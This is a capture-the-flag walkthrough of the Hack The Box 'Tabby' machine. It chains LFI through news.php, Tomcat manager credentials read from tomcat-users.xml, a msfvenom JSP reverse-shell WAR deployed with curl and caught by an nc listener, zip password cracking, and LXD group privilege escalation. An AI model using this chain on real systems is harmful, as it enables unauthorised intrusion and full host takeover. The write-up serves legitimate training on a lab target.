
Tabby Write Up – Hack The Box

Edit: Because of a move to a new server, the image files for this article are missing.

Enumeration

First I started with enumeration of the box. A simple nmap scan of all ports with service detection (-p- for every TCP port, -A for version detection and default scripts) gave me the result:

nmap -T4 -p- -A 10.10.10.194

Initial Foothold:

From the nmap results we can see that there are 3 ports open: 22 (SSH), 80 (HTTP) and 8080. We can also see that on port 8080 there is a Tomcat server running.

The website on port 80:

The website on port 8080:

After clicking on all the links on the port 80 website I found something interesting: a link that uses the hostname megahosting.htb.

From here you need to do a few steps. First add megahosting.htb to /etc/hosts, pointing at 10.10.10.194.

After that is done we can see that we have the possibility of LFI in the file parameter of news.php. I usually first try to see if I can read the passwd file. In this case YES.

Ok, let's search for RCE now. We need a way in (a reverse shell). The website on port 8080 runs Tomcat, so I started googling how to exploit that with the LFI. Also on that page we can see some admin portals (Tomcat's manager applications). Tomcat keeps its manager credentials in tomcat-users.xml, and on Ubuntu's tomcat9 package that file is not where a default Tomcat install would put it; if you are interested in the layout please check this link: https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory

Otherwise you can copy and paste the URL below into your address bar (view-source: stops the browser from rendering the XML):

view-source:http://megahosting.htb/news.php?file=../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

How about that? Look at what we have found: a username and password, together with the roles assigned to that account. Check the roles before going further: the curl commands below talk to the manager's text interface (/manager/text/...), which requires the manager-script role; manager-gui on its own only gives you the HTML manager at /manager/html.

Now it is time to figure out how to exploit that now that we have a user and a password. I guess that there are several ways to do it, but my original thought was a msfvenom payload.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOUR_IP LPORT=PORT -f war > shell.war

This will give you a WAR file with a JSP shell inside that will connect back to your machine when the JSP is requested. If you want to learn more about shells please read THIS.

Ok, so what now? Let's see what we have and what we need to do. We have a user and password, and we have a payload that will call back to our machine and give us a shell. What's left is to upload it and deploy it.

Upload and deploy the shell (curl -T sends the WAR with an HTTP PUT; the path parameter is the context path it will be deployed under):

curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/payloadshell'

List the deployed applications and confirm the new context shows up as running (the text interface answers one line per application in the form context:state:sessions:docbase):

curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list

Before we execute the shell we need to start a nc listener on our machine. Use the command below with PORT being the one you chose in the payload:

nc -nvlp PORT

Execute the shell by requesting the context path; that runs the JSP, which connects back to the listener:

curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/payloadshell/
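The curl commands above depend on two things that are easy to get wrong: the account pulled out of tomcat-users.xml must hold the manager-script role (the text interface refuses users who only have manager-gui), and the WAR should show up as running in the list output before you request it. The script below is an added example, not code from the original write-up. It parses a constructed copy of tomcat-users.xml and a constructed /manager/text/list response offline; the roles given to the tomcat user in that sample are an assumption, since the post's screenshot of the real file is missing. The lfi_url helper builds the news.php traversal URL from the write-up for any path, so it can be reused for other files.

```shell
#!/usr/bin/env bash
# Added example for this write-up, not code from the original post.
# Offline checks around the Tomcat manager "text" interface:
#   1. does the account from tomcat-users.xml hold manager-script, the role
#      /manager/text/* requires (manager-gui alone is not enough);
#   2. does /manager/text/list show the WAR as "running" before we curl it.
# All inputs are constructed below; the roles assigned to "tomcat" in the
# sample are an assumption, not what the real box returned.

# Build the LFI URL used to pull an arbitrary file through news.php.
# Nine "../" are enough to reach / from the web root; extra ones are harmless.
lfi_url() {
    local path="$1" dots='../../../../../../../../../'
    printf 'http://megahosting.htb/news.php?file=%s%s\n' "$dots" "${path#/}"
}

# Extract attribute $2 from a single XML element line $1 (double-quoted attrs).
xml_attr() {
    printf '%s\n' "$1" | sed -n "s/.*[[:space:]]$2=\"\([^\"]*\)\".*/\1/p"
}

# Print username:password for every <user .../> element in file $1.
tomcat_creds() {
    grep -o '<user [^>]*/>' "$1" | while IFS= read -r line; do
        printf '%s:%s\n' "$(xml_attr "$line" username)" "$(xml_attr "$line" password)"
    done
}

# Print the roles attribute of user $2 in file $1.
user_roles() {
    grep -o '<user [^>]*/>' "$1" | while IFS= read -r line; do
        if [ "$(xml_attr "$line" username)" = "$2" ]; then
            xml_attr "$line" roles
        fi
    done
}

# Exit 0 if user $2 in file $1 holds role $3.
has_role() {
    user_roles "$1" "$2" | tr ',' '\n' | grep -qx -- "$3"
}

# The deploy/list commands use /manager/text, which needs manager-script;
# manager-gui only unlocks the HTML manager at /manager/html.
manager_text_usable() {
    has_role "$1" "$2" manager-script
}

# Parse a saved /manager/text/list response: first line "OK - ...", then one
# "context:state:sessions:docbase" line per application. Print the state of $2.
app_state() {
    local list="$1" ctx="$2"
    head -n1 "$list" | grep -q '^OK' || return 1
    awk -F: -v c="$ctx" 'NR>1 && $1==c {print $2; found=1} END {exit !found}' "$list"
}

# Constructed sample inputs (the roles line is an assumption for the sample).
make_samples() {
    local dir
    dir="$(mktemp -d)"
    cat > "$dir/tomcat-users.xml" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
EOF
    cat > "$dir/list.txt" <<'EOF'
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/payloadshell:running:0:payloadshell
/manager:running:0:manager
EOF
    printf '%s\n' "$dir"
}

# Walk-through on the constructed samples, mirroring the write-up's flow.
demo() {
    local d state
    d="$(make_samples)"
    echo "LFI URL:  $(lfi_url /usr/share/tomcat9/etc/tomcat-users.xml)"
    echo "creds:    $(tomcat_creds "$d/tomcat-users.xml")"
    if manager_text_usable "$d/tomcat-users.xml" tomcat; then
        echo "roles ok: manager-script present, /manager/text deploy should work"
    else
        echo "roles:    no manager-script, /manager/text requests will be refused"
    fi
    state="$(app_state "$d/list.txt" /payloadshell)" \
        && echo "deployed: /payloadshell is $state, safe to curl it"
    rm -rf "$d"
}
demo
```

To use it against the real target, feed lfi_url's output to curl -s and save the response as the file you pass to tomcat_creds and user_roles; likewise save the output of the list command and pass it to app_state before triggering the shell.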

User:

Ok, we have the shell now. We can check which user we are with id, and in this case we are tomcat. Let's get a better, fully interactive shell by using:

python3 -c 'import pty; pty.spawn("/bin/bash")'

After some browsing the only interesting thing I found was a password-protected backup file in zip format. Download it to your local machine and crack it with a wordlist:

fcrackzip -D -p rockyou.txt 16162020_backup.zip

The result will be the zip password. Two things to watch: rockyou.txt must be uncompressed, and fcrackzip's dictionary mode (-D, wordlist given with -p) can report false positives, so add -u to make it verify each candidate by actually unzipping.

Now we can switch users with su, reusing the cracked password, following the screen below:

After switching users we can locate the user flag, which is located in /home/ash.

CONGRATS YOU HAVE USER.

If you get stuck join our Discord. Even if you are not stuck join and chat with like minded people.

ROOT:

If you take a look at the image above you will notice something called lxd in the group list (LXD is the system container manager; membership of its group is the important part, because a member can launch a privileged container with the host's filesystem mounted inside it, which is effectively root on the host). I started googling about this to see what we can do with it. If you want to read about it I will link an article that was really interesting, at least to me. Follow the article, or I will just paste the commands below (they are my commands, so check whether you get the same filename: the Alpine image is stamped with its version and build date).

On your local machine (the build script needs root, and the box fetches the image with wget from 10.10.14.3, so afterwards serve the directory over HTTP on port 80, for example with Python's http.server module, and replace 10.10.14.3 with your own VPN IP):

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo su
./build-alpine

Remote (Tabby) machine – in ash's home directory, with the filename replaced by whatever build-alpine produced:

wget 10.10.14.3/alpine-v3.12-x86_64-20200804_1115.tar.gz
lxc image import ./alpine-v3.12-x86_64-20200804_1115.tar.gz --alias myimage
lxc image list
lxc init myimage ethicalhacs -c security.privileged=true
lxc config device add ethicalhacs mydevice disk source=/ path=/mnt/root recursive=true
lxc start ethicalhacs
lxc exec ethicalhacs /bin/sh
cd /mnt/root/root

In that folder you will be able to find root.txt: the container mounts the host's / under /mnt/root, and because it runs with security.privileged=true, root inside the container can read and write everything on Tabby. If lxc init fails because no storage pool exists yet, run lxd init first and accept the defaults, then repeat the steps.

I hope you liked the write-up. The root step does not have many images, so leave me a comment if you don't understand something. I will probably make a video on it.
